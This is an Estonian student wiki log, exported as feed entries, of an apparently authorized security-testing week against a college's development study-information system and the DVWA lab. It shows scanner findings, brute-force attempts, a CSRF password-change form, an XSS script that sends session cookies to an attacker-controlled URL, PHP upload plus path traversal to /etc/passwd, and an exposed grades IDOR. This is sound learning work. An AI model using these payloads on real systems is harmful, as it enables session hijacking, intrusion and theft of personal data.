    Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Skänneerimine:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The page language is: en&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; has a &amp;quot;&amp;lt;form&amp;gt;&amp;quot; element with auto-complete enabled.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;A comment with the string &amp;quot;&amp;lt;p&amp;amp;gt;tunne end kui koolis&amp;lt;/p&amp;amp;gt;&amp;quot; was found in: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Found a form login. The action of the form is: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  The username field to be used is: &amp;quot;username&amp;quot;.&lt;br /&gt;
  The password field to be used is: &amp;quot;pw&amp;quot;.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;Found authentication credentials to: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;. A correct user and password combination is: Administrador/6666666&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  Antud kasutaja ja parooliga sisse ei saanud.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; returned a response that may contain a &amp;quot;SHA1&amp;quot; hash. The hash is: &amp;quot;c7b39896de5f296b5a44c2dfcd9f0600b2cf424d&amp;quot;. This is uncommon and requires human verification.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; sent these cookies:&amp;lt;/li&amp;gt;&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/&lt;br /&gt;
&amp;lt;li&amp;gt;The SMTP settings in emailReport plugin seem to be incorrect. Original error: &amp;quot;[Errno 111] Connection refused&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Kui tuleb see veateade, siis skänn katkeb.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;SQL injection in a Unknown database was found at: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;, using HTTP method POST.&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The sent post-data was: &amp;quot;username=John8212&amp;amp;security_key_sis_global=d&#039;z&amp;quot;0&amp;amp;Login=Logi%20sisse&amp;amp;continue=56&amp;amp;pw=FrAmE30.&amp;quot;.&lt;br /&gt;
    The modified parameter was &amp;quot;security_key_sis_global&amp;quot;. This vulnerability was found in the request with id 390.&lt;br /&gt;
&amp;lt;li&amp;gt;Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt&amp;lt;/li&amp;gt;&lt;br /&gt;
  User-agent: *&lt;br /&gt;
  Disallow: /&lt;br /&gt;
  Allow: /curriculum&lt;br /&gt;
  Allow: /subject&lt;br /&gt;
  Allow: /diploma&lt;br /&gt;
  Allow: /schedule/ical&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 4. päev - Presentatsiooni tegemine ja esitlemine ==&lt;br /&gt;
&lt;br /&gt;
Koostasime presentatsiooni ja esitlemine.&lt;br /&gt;
&lt;br /&gt;
[[Media:Security_team_presentation.ppt]]&lt;br /&gt;
&lt;br /&gt;
== Arvamused intensiivõppe nädala kohta ==&lt;br /&gt;
&lt;br /&gt;
Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
Alo Konno A21&lt;br /&gt;
&lt;br /&gt;
Urmo Lihten A21&lt;br /&gt;
&lt;br /&gt;
Taavi Podžuks A22&lt;br /&gt;
&lt;br /&gt;
Matis Alliksoo A22&lt;br /&gt;
&lt;br /&gt;
Sander Saarm A22&lt;br /&gt;
&lt;br /&gt;
== Juhendajad ==&lt;br /&gt;
Mart Mangus&lt;br /&gt;
&lt;br /&gt;
Margus Ernits&lt;br /&gt;
&lt;br /&gt;
Valter Kungla&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47050</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47050"/>
		<updated>2012-03-30T13:48:16Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* 1. päev - Materjalidega tutvumine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidega tutvumine ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;POOLELI!&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
    A1: Injection - Urmo&lt;br /&gt;
    A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
    A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
    A4: Insecure Direct Object References - Alo&lt;br /&gt;
    A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
    A6: Security Misconfiguration - Matis&lt;br /&gt;
    A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
    A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
    A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
    A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
Sanderi konspekt: [[Media:Ois_materjal.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Media:A9.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Media:A5.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Matise esitlus [[Media:Security Misconfiguration.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
===Security Team tegevusplaan===&lt;br /&gt;
1.	Päev&lt;br /&gt;
 1.1	Tutvuda OWASP’iga. &lt;br /&gt;
 1.2	Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.&lt;br /&gt;
 1.3	Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.&lt;br /&gt;
2.	Päev&lt;br /&gt;
 2.1	Esitada tiimi tegevusplaan.&lt;br /&gt;
 2.2	Tutvuda turvariskidega natuke põhjalikumalt.&lt;br /&gt;
 2.3	Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.&lt;br /&gt;
 2.4	Täiendada esimese päeva ettekannet.&lt;br /&gt;
3.	Päev&lt;br /&gt;
 3.1	Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.&lt;br /&gt;
 3.2	Saadud tulemuste dokumenteerimine.&lt;br /&gt;
4.	Päev&lt;br /&gt;
 4.1	Saadud tulemuste esitlemine ettekandega&lt;br /&gt;
5.	Päev&lt;br /&gt;
 5.1	Tulemuste parandamine wiki’s.&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
http://www.acunetix.com/support/vulnerability-checks.htm&lt;br /&gt;
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting&lt;br /&gt;
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting&lt;br /&gt;
http://www.youtube.com/watch?v=SG1cvGQ971g&lt;br /&gt;
http://www.isecom.org/research.html&lt;br /&gt;
http://evuln.com/tools/&lt;br /&gt;
http://sectools.org/tag/web-scanners/&lt;br /&gt;
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/getting-started.htm&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:&lt;br /&gt;
Acunetix Web Vulnerability Scanner v. 8&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/&lt;br /&gt;
&lt;br /&gt;
Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.&lt;br /&gt;
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.&lt;br /&gt;
Antud programm võimaldab skännida:&lt;br /&gt;
Cross-Site Scripting (XSS)&lt;br /&gt;
SQL Injection (blind test)&lt;br /&gt;
File inclusion&lt;br /&gt;
Code Execution&lt;br /&gt;
LDAP Injection&lt;br /&gt;
Cross Frame Scripting&lt;br /&gt;
SQL Injection (error msg. test)&lt;br /&gt;
CRLF Injection&lt;br /&gt;
Directory Travelsal&lt;br /&gt;
XPath Injection&lt;br /&gt;
URL Redirection&lt;br /&gt;
Application Error Message&lt;br /&gt;
&lt;br /&gt;
Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.&lt;br /&gt;
&lt;br /&gt;
Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application&#039;i.&lt;br /&gt;
&lt;br /&gt;
==== Brute Force (DVWA) ====&lt;br /&gt;
Käsitsi välja uuritud login andmed:&lt;br /&gt;
kasutajanimi: admin&lt;br /&gt;
parool: password&lt;br /&gt;
&lt;br /&gt;
===== Fireforce plugin Firefoxis =====&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce. &lt;br /&gt;
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .&lt;br /&gt;
&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud. &lt;br /&gt;
Selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse. &lt;br /&gt;
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada. &lt;br /&gt;
Päringute tegemise kiirus vähem kui 1 päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
Kasutasime ka videos näidatud &amp;quot;@ DICTIONARY&amp;quot; teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
===== Burpsuite v1.4 =====&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI&#039;st]]&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
Kahjuks ka see rünne ei toiminud teadmata põhjusel. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega ja edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt. &lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
==== CSRF - Cross-site request forgery ====&lt;br /&gt;
Katsetamine toimub koos Taaviga.&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna &amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==== Reflected Cross Site Scripting (XSS)  ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
[[Image:Xsstesting.jpg|Location=&amp;quot;left&amp;quot;|Caption|]]&lt;br /&gt;
&amp;lt;br&amp;gt;Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
&amp;lt;li&amp;gt;Easy puhul:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Saab sisestada textboxi skripti:&amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
    &amp;lt;li&amp;gt;Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
&amp;lt;br&amp;gt;Näide logist:&amp;lt;/li&amp;gt;&lt;br /&gt;
    /var/log/apache2/access.log&lt;br /&gt;
    127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot;                  &amp;lt;br&amp;gt;  &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
&amp;lt;li&amp;gt;Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]&lt;br /&gt;
&lt;br /&gt;
SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
    &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
  esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
  teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
    &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida ei saa näiteks järgnevates formaatides faile:&amp;lt;/li&amp;gt;&lt;br /&gt;
  .htaccess&lt;br /&gt;
  .php	.html	.pdf&lt;br /&gt;
  .gif	.png	.bmp&lt;br /&gt;
  .svg	.swf&lt;br /&gt;
  .tif	.tiff	.exif&lt;br /&gt;
  .raw	.cgm&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
  Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
  ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
  data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]&lt;br /&gt;
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.&amp;lt;br&amp;gt;&lt;br /&gt;
Faile saab alla laadida enda profiili all õppesooritustes.&amp;lt;br&amp;gt;&lt;br /&gt;
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.&amp;lt;br&amp;gt;&lt;br /&gt;
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
====Subgraph Vega ====&lt;br /&gt;
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.&lt;br /&gt;
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.&lt;br /&gt;
Programm on Java põhine graafilise liidesega ja töötab Linux&#039;i, OS X ja Windowsi peal.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]&lt;br /&gt;
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.&lt;br /&gt;
&lt;br /&gt;
Alustasime uut skänni (Start New Scan).&lt;br /&gt;
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.&lt;br /&gt;
&lt;br /&gt;
Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised. &lt;br /&gt;
&lt;br /&gt;
Me lisasime ainult küpsise (cookie) sisu: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
ning Finish.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]&lt;br /&gt;
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).&lt;br /&gt;
&lt;br /&gt;
Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000. &lt;br /&gt;
&lt;br /&gt;
Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script&#039;ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body  nõrkust.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
